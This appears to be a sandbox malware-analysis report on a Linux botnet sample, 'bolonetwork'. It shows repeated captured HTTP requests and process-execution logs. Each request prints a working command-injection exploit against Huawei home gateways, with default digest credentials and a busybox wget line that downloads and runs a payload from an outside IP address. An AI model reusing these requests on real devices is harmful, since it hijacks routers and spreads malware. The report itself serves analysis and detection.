                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    142192.168.2.1441788157.119.94.14337215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.524636984 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    143192.168.2.1451680197.26.218.2637215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.525490999 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    144192.168.2.1454082197.56.126.12237215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.525490999 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    145192.168.2.1460832157.189.254.10037215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.529923916 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    146192.168.2.1447416152.57.176.3737215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.530154943 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    147192.168.2.1454396197.211.79.23037215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.530155897 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    148192.168.2.144377432.36.66.24937215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.533087015 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    149192.168.2.144375698.174.205.22937215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.533087015 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    System Behavior

                                                    Start time (UTC):06:26:01
                                                    Start date (UTC):10/07/2024
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):06:26:01
                                                    Start date (UTC):10/07/2024
                                                    Path:/usr/bin/rm
                                                    Arguments:rm -f /tmp/tmp.OoywKx7u03 /tmp/tmp.psVYtsi0OO /tmp/tmp.vhqRrcVLNp
                                                    File size:72056 bytes
                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                    Start time (UTC):06:26:02
                                                    Start date (UTC):10/07/2024
                                                    Path:/usr/bin/dash
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):06:26:02
                                                    Start date (UTC):10/07/2024
                                                    Path:/usr/bin/rm
                                                    Arguments:rm -f /tmp/tmp.OoywKx7u03 /tmp/tmp.psVYtsi0OO /tmp/tmp.vhqRrcVLNp
                                                    File size:72056 bytes
                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                    Start time (UTC):06:26:08
                                                    Start date (UTC):10/07/2024
                                                    Path:/tmp/bolonetwork.x86.elf
                                                    Arguments:/tmp/bolonetwork.x86.elf
                                                    File size:107432 bytes
                                                    MD5 hash:808f3ef3bb55ce80b71edfd7e2fd731c

                                                    Start time (UTC):06:26:08
                                                    Start date (UTC):10/07/2024
                                                    Path:/tmp/bolonetwork.x86.elf
                                                    Arguments:-
                                                    File size:107432 bytes
                                                    MD5 hash:808f3ef3bb55ce80b71edfd7e2fd731c

                                                    Start time (UTC):06:26:08
                                                    Start date (UTC):10/07/2024
                                                    Path:/tmp/bolonetwork.x86.elf
                                                    Arguments:-
                                                    File size:107432 bytes
                                                    MD5 hash:808f3ef3bb55ce80b71edfd7e2fd731c

                                                    Start time (UTC):06:26:08
                                                    Start date (UTC):10/07/2024
                                                    Path:/tmp/bolonetwork.x86.elf
                                                    Arguments:-
                                                    File size:107432 bytes
                                                    MD5 hash:808f3ef3bb55ce80b71edfd7e2fd731c
                                                    Start time (UTC):06:26:09
                                                    Start date (UTC):10/07/2024
                                                    Path:/tmp/bolonetwork.x86.elf
                                                    Arguments:-
                                                    File size:107432 bytes
                                                    MD5 hash:808f3ef3bb55ce80b71edfd7e2fd731c